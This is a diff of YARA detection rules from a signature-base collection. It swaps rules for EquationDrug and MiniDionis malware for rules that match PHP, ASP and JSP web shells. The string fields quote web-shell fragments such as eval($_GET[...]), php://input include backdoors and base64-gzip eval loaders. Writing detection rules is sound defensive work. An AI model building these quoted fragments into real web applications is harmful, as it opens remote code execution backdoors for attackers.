-		$s6 = "\\Device\\%ws" wide
+		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+		$s3 = "{eval($_GET['idc']);}" fullword
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Equationdrug_Filesystem_Filter
+rule SIGNATURE_BASE_Webshell_Cpg_143_Incl_Xpl
 {
 	meta:
-		description = "EquationDrug - Filesystem filter driver - volrec.sys, scsi2mgr.sys"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "7077daf6-3d51-5ff2-bc74-95cb169a7cd2"
-		date = "2015-03-11"
+		description = "Web Shell - file cpg_143_incl_xpl.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L577-L591"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1043-L1057"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "57fa4a1abbf39f4899ea76543ebd3688dcc11e13"
-		logic_hash = "5da0c279da1b84a41e7d15df3c19cd50af1872156f133de0a367b9140425aa11"
-		score = 75
+		hash = "5937b131b67d8e0afdbd589251a5e176"
+		logic_hash = "7c2ce25c33e167761d72331d7c4d4f7cd6029ee0caf6e2008df8b12894faaaf8"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "volrec.sys" fullword wide
-		$s1 = "volrec.pdb" fullword ascii
-		$s2 = "Volume recognizer driver" fullword wide
+		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Apt_Equation_Keyword : FILE
+rule SIGNATURE_BASE_Webshell_Mumaasp_Com
 {
 	meta:
-		description = "Rule to detect Equation group's keyword in executable file"
-		author = "Florian Roth"
-		id = "a7d4eda5-f390-5099-9c46-bf74a878b4f0"
-		date = "2015-09-26"
+		description = "Web Shell - file mumaasp.com.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-03-29"
-		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_equation_fiveeyes.yar#L593-L604"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1058-L1071"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d9a2b31d078eabbc930e9ec06e5ead5a6cda4eebf1c0ebe8164caf75a9d3cba6"
-		score = 75
+		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+		logic_hash = "75e2a056782190e9914264b9e34002faea75a35ab0f97bf1e05dec15432d064c"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Backsnarf_AB25" wide
-		$a2 = "Backsnarf_AB25" ascii
+		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $a* )
+		all of them
 }
-rule SIGNATURE_BASE_Minidionis_Readerview : FILE
+rule SIGNATURE_BASE_Webshell_Php_404
 {
 	meta:
-		description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+		description = "Web Shell - file 404.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dc8d4311-2a87-5c9b-95ff-52708f293f01"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L10-L35"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1072-L1085"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45ae1be675f2b7b3d89aea2bde66f9f96b55b6fbf81e3783c209c7d6d4355026"
-		score = 75
+		hash = "ced050df5ca42064056a7ad610a191b3"
+		logic_hash = "3fc928e6edda8fdc4220f57215db61b7fbf8de5b00423b219a173c8ecde40b79"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
-		hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
-		hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
-		hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
-		hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
-		hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
 
 	strings:
-		$s1 = "%ws_out%ws" fullword wide
-		$s2 = "dnlibsh" fullword ascii
-		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
-		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
-		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
+		$s0 = "$pass = md5(md5(md5($pass)));" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) and 1 of ( $op* )
+		all of them
 }
-rule SIGNATURE_BASE_Malicious_SFX1 : FILE
+rule SIGNATURE_BASE_Webshell_Webshell_Cnseay_X
 {
 	meta:
-		description = "SFX with voicemail content"
+		description = "Web Shell - file webshell-cnseay-x.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c29dfb0-bbed-5017-80b4-a5c44024cd70"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L39-L53"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1086-L1099"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f"
-		logic_hash = "fd7b4c504a52e68fe87eeb9f7066c61ddc47257ac9324a60d219c022d3affbbf"
-		score = 75
+		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+		logic_hash = "59cb8b8a5873b716a25096c7b12f09293a812b63f31fea07d919b9c4d2bc9a19"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "voicemail" ascii
-		$s1 = ".exe" ascii
+		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
 
 	condition:
-		uint16( 0 ) == 0x4b50 and filesize < 1000KB and $s0 in ( 3 .. 80 ) and $s1 in ( 3 .. 80 )
+		all of them
 }
-rule SIGNATURE_BASE_Malicious_SFX2 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Up
 {
 	meta:
-		description = "SFX with adobe.exe content"
+		description = "Web Shell - file up.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff59d638-4d82-5a14-b346-3df2154d3c34"
-		date = "2015-07-20"
-		modified = "2023-12-05"
-		reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L55-L70"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1100-L1114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d"
-		logic_hash = "a2ed7660604ff3c9f2d0dbb454f5d168cd61d1d5e647b5c74fe24f25ebb3dbfd"
-		score = 75
+		hash = "f775e721cfe85019fe41c34f47c0d67c"
+		logic_hash = "dff2896d2226ade08e74147121a0e0036e8545dfff36b48b5a0771c9c7d537e9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "adobe.exe" fullword ascii
-		$s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s3 = "GETPASSWORD1" fullword wide
+		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Minidionis_VBS_Dropped : FILE
+rule SIGNATURE_BASE_Webshell_Phpkit_0_1A_Odd
 {
 	meta:
-		description = "Dropped File - 1.vbs"
+		description = "Web Shell - file odd.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0116861-4216-504a-a39b-463e7535a2b3"
-		date = "2015-07-21"
-		modified = "2023-12-05"
-		reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_minidionis.yar#L72-L89"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1115-L1131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646"
-		logic_hash = "a24fe4cdff6dd7951af10710eb63ab1fd90ab0e43bbce4388d6687abac206da5"
-		score = 75
+		hash = "3c30399e7480c09276f412271f60ed01"
+		logic_hash = "745734658ed4000e1399531ae44125f8462ecd37388e6223cfa9bf91dbb52bbc"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Wscript.Sleep 5000" ascii
-		$s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
-		$s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
-		$s4 = "If(FSO.FileExists(\"" ascii
-		$s5 = "then FSO.DeleteFile(\".\\" ascii
+		$s1 = "include('php://input');" fullword
+		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s4 = "// uses include('php://input') to execute arbritary code" fullword
+		$s5 = "// php://input based backdoor" fullword
 
 	condition:
-		filesize < 1KB and all of them and $s1 in ( 0 .. 40 )
+		2 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi_3
+rule SIGNATURE_BASE_Webshell_ASP_Cmd
 {
 	meta:
-		description = "Web Shell - file h4ntu shell powered by tsoi.php"
-		author = "Florian Roth"
-		id = "2a493748-85eb-561e-98b3-0eed82026510"
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
-		modified = "2025-03-21"
-		old_rule_name = "Webshell_h4ntu_shell_powered_by_tsoi_"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L32-L47"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1132-L1145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "871e9a057ca3920fcebaec5c2555c2d936d813c0d8bb2a6a69726dee7a796ff8"
+		hash = "97af88b478422067f23b001dd06d56a9"
+		logic_hash = "c1353e43876e18f18638a558a29a12d6e82603641fedd81b042adca91fea0d18"
 		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
-		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
-		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_H4Ntu_Shell_Powered_Tsoi : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Shell_X3
 {
 	meta:
-		description = "Semi-Auto-generated - file h4ntu shell [powered by tsoi].txt"
-		author = "Florian Roth"
-		id = "0e38b0fc-721a-5591-aeb7-f9dca45b7114"
-		date = "2014-03-29"
-		modified = "2025-03-21"
-		old_rule_name = "Webshell_h4ntu_shell__powered_by_tsoi_"
+		description = "Web Shell - file PHP Shell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L48-L63"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1146-L1161"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "06ed0b2398f8096f1bebf092d0526137"
-		logic_hash = "3d9b568a66f3e6933b385fed30921883dd7be17863670c648702ae3403b6e8a1"
-		score = 80
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+		logic_hash = "7361a7eecf345b9c1809294b6b081db8769805ec3e6c656adc4ac87261193683"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<title>h4ntu shell"
-		$x2 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
 
 	condition:
-		filesize < 100KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Sql
+rule SIGNATURE_BASE_Webshell_PHP_G00Nv13
 {
 	meta:
-		description = "Web Shell - file sql.php"
+		description = "Web Shell - file g00nv13.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L65-L79"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1162-L1176"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2cf20a207695bbc2311a998d1d795c35"
-		logic_hash = "83049c3c5bce88d239b59accb173e234c3169f59187de17b7e6c2a0aa58a552f"
+		hash = "35ad2533192fe8a1a76c3276140db820"
+		logic_hash = "dd9f03a7ad0d2b73f7a8602ab267e0e8e5cb1f9250f9a25c86ded3797df2f8d5"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
-		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_A
+rule SIGNATURE_BASE_Webshell_Php_H6Ss
 {
 	meta:
-		description = "Web Shell - file a.php"
+		description = "Web Shell - file h6ss.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L80-L95"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1177-L1190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e3b461f7464d81f5022419d87315a90d"
-		logic_hash = "6bdd5fbe9b16f2d84b884239cf3b6453587933c6b0c4308508d10019b4f36e38"
+		hash = "272dde9a4a7265d6c139287560328cd5"
+		logic_hash = "c4001be111ff271335dd65c15c59da979a8e202bcf58a7f10de7f03644472153"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
-		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
-		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+		$s0 = "<?php eval(gzuncompress(base64_decode(\""
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Imhapftp_2
+rule SIGNATURE_BASE_Webshell_Jsp_Zx
 {
 	meta:
-		description = "Web Shell - file iMHaPFtp.php"
+		description = "Web Shell - file zx.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L96-L110"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1191-L1204"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12911b73bc6a5d313b494102abcf5c57"
-		logic_hash = "9099504870c1e466808060f11aea38472832846d24e3c84fdd69b7d26bfed69d"
+		hash = "67627c264db1e54a4720bd6a64721674"
+		logic_hash = "d97df624801d0f24141dfe7074d290a56e639af7d867c907362ff4434c3eeac0"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
-		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jspspyweb
+rule SIGNATURE_BASE_Webshell_Ani_Shell
 {
 	meta:
-		description = "Web Shell - file Jspspyweb.jsp"
+		description = "Web Shell - file Ani-Shell.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L111-L125"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1205-L1220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4e9be07e95fff820a9299f3fb4ace059"
-		logic_hash = "491d9c4efee27469f2a26f6fcb7f7c768eac60977e640096ea5f78ff346e7fbe"
+		hash = "889bfc9fbb8ee7832044fc575324d01a"
+		logic_hash = "c8caf8686c36a41b5aae093e88b8872350cf625c59a14389c5df93f284c8f05a"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
-		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+		$s0 = "$Python_CODE = \"I"
+		$s6 = "$passwordPrompt = \"\\n================================================="
+		$s7 = "fputs ($sockfd ,\"\\n==============================================="
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2
+rule SIGNATURE_BASE_Webshell_Jsp_K8Cmd
 {
 	meta:
-		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		description = "Web Shell - file k8cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L126-L140"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1221-L1234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-		logic_hash = "d3d27d80f5f3adbc050a59d0c25953ec5d634344b5d051a4abdf4eeed3b8b035"
+		hash = "b39544415e692a567455ff033a97a682"
+		logic_hash = "e523a5b1118c6f4d5798f130c00466c7945d27a6fbe0d4cb3a40b7f36da2a502"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
-		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Simattacker_Vrsion_1_0_0_Priv8_4_My_Friend
+rule SIGNATURE_BASE_Webshell_Jsp_Cmd
 {
 	meta:
-		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		description = "Web Shell - file cmd.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L141-L155"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1236-L1249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
-		logic_hash = "fc553942b06b305f7b0d5b072a8d4517b0e51229545440ea9c43e9be01d64efa"
+		hash = "5391c4a8af1ede757ba9d28865e75853"
+		logic_hash = "e48d4e2d14a3605fd9dda03630820a0fb53d893cc4d283739fde11f9ab7d9d1e"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
-		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Pwhash
+rule SIGNATURE_BASE_Webshell_Jsp_K81
 {
 	meta:
-		description = "Web Shell - file pwhash.php"
+		description = "Web Shell - file k81.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L156-L170"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1251-L1265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ba120abac165a5a30044428fac1970d8"
-		logic_hash = "616c0570550cdb9394b5675864d4eec3fa62390f880817406b2a3b63952b69f0"
+		hash = "41efc5c71b6885add9c1d516371bd6af"
+		logic_hash = "f9c6b5bec9313c6fd059055fa18332675838419bba3348bb852b50806f26ccb2"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
-		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Phpremoteview
+rule SIGNATURE_BASE_Webshell_ASP_Zehir
 {
 	meta:
-		description = "Web Shell - file PHPRemoteView.php"
+		description = "Web Shell - file zehir.asp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
